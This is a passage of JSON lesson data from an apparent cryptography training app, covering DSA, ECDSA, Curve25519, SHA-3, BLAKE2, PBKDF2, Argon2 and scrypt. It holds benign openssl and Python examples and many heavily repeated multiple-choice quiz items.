Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-dsa","cat":"Cryptography","title":"DSA Digital Signature Algorithm","diff":2,"xp":150,"intro":"Government standard for digital signatures.","sections":[{"type":"text","content":"Government standard for digital signatures."},{"type":"code","lang":"bash","content":"# DSA: signing only (not encryption)\n# Based on discrete logarithm problem\nopenssl genpkey -algorithm DSA -out dsa_key.pem\nopenssl dgst -sha256 -sign dsa_key.pem -out sig.bin file"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"DSA is used for...","opts":["Encryption","Digital signatures only","Key exchange","Hashing"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-ecdsa","cat":"Cryptography","title":"ECDSA Signatures","diff":2,"xp":150,"intro":"Elliptic curve version of DSA \u2014 smaller keys, same security.","sections":[{"type":"text","content":"Elliptic curve version of DSA \u2014 smaller keys, same security."},{"type":"code","lang":"bash","content":"# ECDSA: 256-bit key = 3072-bit RSA security\nopenssl ecparam -genkey -name prime256v1 -out ec_key.pem\nopenssl dgst -sha256 -sign ec_key.pem -out sig.bin file\nopenssl dgst -sha256 -verify ec_pub.pem -signature sig.bin file"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"ECDSA 256-bit equals RSA...","opts":["256-bit","1024-bit","3072-bit","8192-bit"],"ans":2},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-x25519","cat":"Cryptography","title":"Curve25519 Key Exchange","diff":3,"xp":200,"intro":"Modern elliptic curve for key agreement \u2014 used everywhere.","sections":[{"type":"text","content":"Modern elliptic curve for key agreement \u2014 used everywhere."},{"type":"code","lang":"bash","content":"# X25519: fast, constant-time, resistant to timing attacks\n# Used in: Signal, WireGuard, TLS 1.3, SSH\n# 256-bit key provides 128-bit security\nopenssl genpkey -algorithm X25519 -out key.pem"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Curve25519 is designed to be...","opts":["Slow","Fast and resistant to timing attacks","Complex","Variable-length"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-sha3","cat":"Cryptography","title":"SHA-3 (Keccak) Hash Function","diff":2,"xp":150,"intro":"NIST's newest hash standard \u2014 different design from SHA-2.","sections":[{"type":"text","content":"NIST's newest hash standard \u2014 different design from SHA-2."},{"type":"code","lang":"bash","content":"# SHA-3 uses sponge construction (not Merkle-Damgard like SHA-2)\n# Not vulnerable to length extension attacks\necho -n 'test' | openssl dgst -sha3-256\npython3 -c 'import hashlib; print(hashlib.sha3_256(b\"test\").hexdigest())'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"SHA-3 differs from SHA-2 by using...","opts":["Merkle-Damgard","Sponge construction","Feistel network","CBC-MAC"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-blake2","cat":"Cryptography","title":"BLAKE2 Hash Function","diff":2,"xp":150,"intro":"Faster than MD5 and more secure than SHA-256.","sections":[{"type":"text","content":"Faster than MD5 and more secure than SHA-256."},{"type":"code","lang":"bash","content":"# BLAKE2: faster than MD5/SHA-1/SHA-256\n# Used in: WireGuard, password hashing, Argon2\npython3 -c 'import hashlib; print(hashlib.blake2b(b\"test\").hexdigest())'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"BLAKE2 is used in WireGuard because...","opts":["It's old","It's faster and more secure than SHA-256","It uses less memory","It's simpler"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-pbkdf2","cat":"Cryptography","title":"PBKDF2 Key Derivation","diff":2,"xp":150,"intro":"Derive encryption keys from passwords with iteration count.","sections":[{"type":"text","content":"Derive encryption keys from passwords with iteration count."},{"type":"code","lang":"bash","content":"# PBKDF2: apply HMAC repeatedly (100000+ iterations)\npython3 -c 'import hashlib; dk=hashlib.pbkdf2_hmac(\"sha256\",b\"password\",b\"salt\",100000); print(dk.hex())'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"PBKDF2 uses iterations to...","opts":["Speed up hashing","Make brute force slower by increasing computation time","Reduce key size","Improve compatibility"],"ans":1},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-argon2","cat":"Cryptography","title":"Argon2 Password Hashing","diff":3,"xp":200,"intro":"Memory-hard hashing \u2014 the current best for password storage.","sections":[{"type":"text","content":"Memory-hard hashing \u2014 the current best for password storage."},{"type":"code","lang":"bash","content":"# Argon2id: combines time and memory hardness\n# Resists both GPU and ASIC attacks\npython3 -c 'from argon2 import PasswordHasher; ph=PasswordHasher(); h=ph.hash(\"password\"); print(h)'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Argon2 resists GPU attacks because...","opts":["It's fast","It requires large amounts of memory (memory-hard)","It uses short keys","It's simple"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-scrypt","cat":"Cryptography","title":"scrypt Key Derivation","diff":2,"xp":150,"intro":"Memory-hard KDF used in cryptocurrency.","sections":[{"type":"text","content":"Memory-hard KDF used in cryptocurrency."},{"type":"code","lang":"bash","content":"# scrypt: requires memory proportional to computation\n# Used in: Litecoin, some password databases\npython3 -c 'import hashlib; dk=hashlib.scrypt(b\"pass\",salt=b\"salt\",n=2**14,r=8,p=1,dklen=32); print(dk.hex())'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"scrypt is memory-hard meaning...","opts":["It uses less memory","It requires large amounts of RAM to compute","It's faster","It's simpler"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature 